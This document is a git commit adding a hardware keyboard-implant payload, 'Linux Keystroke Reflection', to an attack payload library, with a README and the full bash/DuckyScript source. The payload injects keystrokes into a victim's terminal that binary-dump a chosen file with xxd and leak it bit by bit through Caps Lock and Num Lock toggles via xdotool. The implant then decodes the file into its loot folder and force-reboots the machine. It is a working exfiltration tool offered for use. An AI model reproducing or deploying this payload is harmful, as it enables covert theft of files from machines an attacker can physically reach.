"Linux" Keystroke Reflection

Implementation of the "Keystroke Injection" technique for file exfiltration.
2023-11-04 15:32:24 -04:00 · 2023-11-04 15:32:24 -04:00 · 8ca001181a
parent e9302277fb
commit 8ca001181a
2 changed files with 178 additions and 0 deletions
--- a/payloads/library/exfiltration/lin_keystroke-reflection/README.md
+++ b/payloads/library/exfiltration/lin_keystroke-reflection/README.md
@ -0,0 +1,59 @@
+# "Linux" Keystroke Reflection
+
+- Title:            "Linux" Keystroke Reflection
+- Author:           TW-D
+- Version:          1.0
+- Target:           Debian-Based Linux Distributions
+- Category:         Exfiltration
+- Attackmode:       HID
+
+## Description
+
+Implementation of the "Keystroke Injection" technique for file exfiltration.
+
+The table below presents an estimation of the time taken for a specific number of bytes :
+
+| Bytes | Seconds (xdotool) |
+| --- | --- |
+| 5 | Between 10 and 15 |
+| 10 | Between 20 and 25 |
+| 100 | Between 220 and 230 |
+| 1000 | Between 2250 and 2260 |
+
+__Note :__ *The target system must have "xxd" and "xdotool" installed.*
+
+## Configuration
+
+From the file "keystroke-reflection_exfiltration.txt" change the value of the following variable :
+```
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+```
+
+## Trigger
+
+>
+> MATCH __kr:file=(.*?)\[ENTER\]
+>
+
+## Usage
+
+The triggering must be done in a terminal.
+
+```
+:~$ hostname > /tmp/EXFIL
+:~$ __kr:file=/tmp/EXFIL[ENTER]
+```
+
+**OR**
+
+```
+:~$ __kr:file=/etc/hostname[ENTER]
+```
+
+__Note :__ *After triggering, avoid using the keyboard.*
--- a/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt
+++ b/payloads/library/exfiltration/lin_keystroke-reflection/keystroke-reflection_exfiltration.txt
@ -0,0 +1,119 @@
+#!/bin/bash
+#
+# Title:            "Linux" Keystroke Reflection
+# Description:
+#                   Implementation of the 
+#                   "Keystroke Injection" technique 
+#                   for file exfiltration.
+#
+# Author:           TW-D
+# Version:          1.0
+# Target:           Debian-Based Linux Distributions
+# Category:         Exfiltration
+# Attackmode:       HID
+#
+# TESTED ON
+# ===============
+# Ubuntu 22.04.3 LTS with "Logitech Keyboard K120"
+#
+# STATUS
+# ===============
+# Magenta solid ................................... SETUP
+# Yellow single blink ............................. ATTACK
+# Yellow double blink ............................. STAGE2
+# Yellow triple blink ............................. STAGE3
+# White fast blink ................................ CLEANUP
+# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
+#
+
+######## TRIGGER ########
+
+MATCH __kr:file=(.*?)\[ENTER\]
+
+######## INITIALIZATION ########
+
+readonly KR_FILE="$(echo "${LOOT}" | sed 's/\[[^]]*\]//g')"
+readonly KR_BIN="/tmp/keystroke-reflection.bin"
+readonly KEYCROC_LOOT="/root/loot/keystroke-reflection_$(date '+%s')-${RANDOM}"
+
+######## SETUP ########
+
+LED SETUP
+
+export DUCKY_LANG="us"
+
+######## ATTACK ########
+
+LED ATTACK
+
+QUACK STRING " binary_dump=\"\$(xxd -b ${KR_FILE} | cut -d' ' -f2-7)\";"
+QUACK STRING " key_sequence=\"\";"
+QUACK STRING " for ((i=0;i<\"\${#binary_dump}\";i++)); do"
+QUACK STRING " if [ \"\${binary_dump:\$i:1}\" == \"0\" ]; then"
+QUACK STRING " key_sequence+=\"Caps_Lock \";"
+QUACK STRING " elif [ \"\${binary_dump:\$i:1}\" == \"1\" ]; then"
+QUACK STRING " key_sequence+=\"Num_Lock \";"
+QUACK STRING " fi;"
+QUACK STRING " done;"
+QUACK STRING " sleep 3;"
+QUACK STRING " xdotool key --delay 275 \$key_sequence"
+QUACK DELAY 250
+QUACK ENTER
+
+######## STAGE2 ########
+
+LED STAGE2
+
+loop_control="true"
+capslock_state="$(CAPSLOCK_ON)"
+numlock_state="$(NUMLOCK_ON)"
+
+while [ "${loop_control}" == "true" ]; do
+    start_time="$(date '+%s')"
+    while true; do
+        if [ "$(CAPSLOCK_ON)" != "${capslock_state}" ]; then
+            echo -n "0" >> "${KR_BIN}"
+            capslock_state="$(CAPSLOCK_ON)"
+            break
+        elif [ "$(NUMLOCK_ON)" != "${numlock_state}" ]; then
+            echo -n "1" >> "${KR_BIN}"
+            numlock_state="$(NUMLOCK_ON)"
+            break
+        elif [ $(($(date '+%s') - start_time)) -ge 9 ]; then
+            loop_control="false"
+            break
+        fi
+    done
+done
+
+######## STAGE3 ########
+
+LED STAGE3
+
+if [ -f "${KR_BIN}" ]; then
+    for binary in $(cat "${KR_BIN}" | sed 's/\(.\{8\}\)/\1 /g'); do
+        decimal="$((2#${binary}))"
+        hexadecimal="$(printf "%X" "${decimal}")"
+        ascii="$(printf "\\x${hexadecimal}")"
+        echo -en "${ascii}" >> "${KEYCROC_LOOT}"
+    done
+    rm "${KR_BIN}"
+fi
+
+######## CLEANUP ########
+
+LED CLEANUP
+
+sync
+
+######## FINISH ########
+
+LED FINISH
+
+ATTACKMODE OFF
+
+######## OFF ########
+
+LED OFF
+
+reboot --force